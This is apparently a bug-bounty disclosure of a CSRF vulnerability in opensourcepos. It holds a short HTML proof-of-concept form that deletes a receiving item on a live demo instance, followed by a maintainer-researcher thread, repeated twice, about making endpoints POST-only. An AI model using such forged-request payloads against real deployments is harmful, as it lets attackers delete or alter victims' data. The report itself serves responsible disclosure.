Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Oct 4th 2021

Description

You have not set any CSRF protection for receivings/delete_item/{item_id} endpoint.

Proof of Concept

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://dev.opensourcepos.org/receivings/delete_item/1">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago

jekkos

commented 2 years ago

Maintainer

The fix should include this protection. The method is POST only now.

jekkos

commented 2 years ago

Maintainer

https://github.com/opensourcepos/opensourcepos/blob/e8f27f547b061b88ed78232e75e859bdf7ebcd6b/application/hooks/method_hook.php#L8

amammad

commented 2 years ago

Researcher

I tested this dev.opensourcepos.org

Is this instance still vulnerable ?

amammad

commented 2 years ago

Researcher

I test this endpoint and it is still in get :

/sales/complete

and vulnerable to CSRF

jekkos

commented 2 years ago

Maintainer

It might have another build deployed now

jekkos

commented 2 years ago

Maintainer

I'm redeploying.. you can retry in 10mins

amammad

commented 2 years ago

Researcher

as I said, I test again after at now and still this endpoint vulnerable to CSRF

/receivings/complete

because accept GET method besides POST

amammad

commented 2 years ago

Researcher

I test receivings/delete_item/{id} and it is OK, jekkos.

A opensourcepos/opensourcepos maintainer

commented 2 years ago

Maintainer

OK great thanks!

A opensourcepos/opensourcepos maintainer validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

jekkos marked this as fixed with commit e8f27f 2 years ago

jekkos has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago

jekkos

commented 2 years ago

Maintainer

The fix should include this protection. The method is POST only now.

jekkos

commented 2 years ago

Maintainer

https://github.com/opensourcepos/opensourcepos/blob/e8f27f547b061b88ed78232e75e859bdf7ebcd6b/application/hooks/method_hook.php#L8

amammad

commented 2 years ago

Researcher

I tested this dev.opensourcepos.org

Is this instance still vulnerable ?

amammad

commented 2 years ago

Researcher

I test this endpoint and it is still in get :

/sales/complete

and vulnerable to CSRF

jekkos

commented 2 years ago

Maintainer

It might have another build deployed now

jekkos

commented 2 years ago

Maintainer

I'm redeploying.. you can retry in 10mins

amammad

commented 2 years ago

Researcher

as I said, I test again after at now and still this endpoint vulnerable to CSRF

/receivings/complete

because accept GET method besides POST

amammad

commented 2 years ago

Researcher

I test receivings/delete_item/{id} and it is OK, jekkos.

A opensourcepos/opensourcepos maintainer

commented 2 years ago

Maintainer

OK great thanks!

A opensourcepos/opensourcepos maintainer validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

jekkos marked this as fixed with commit e8f27f 2 years ago

jekkos has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation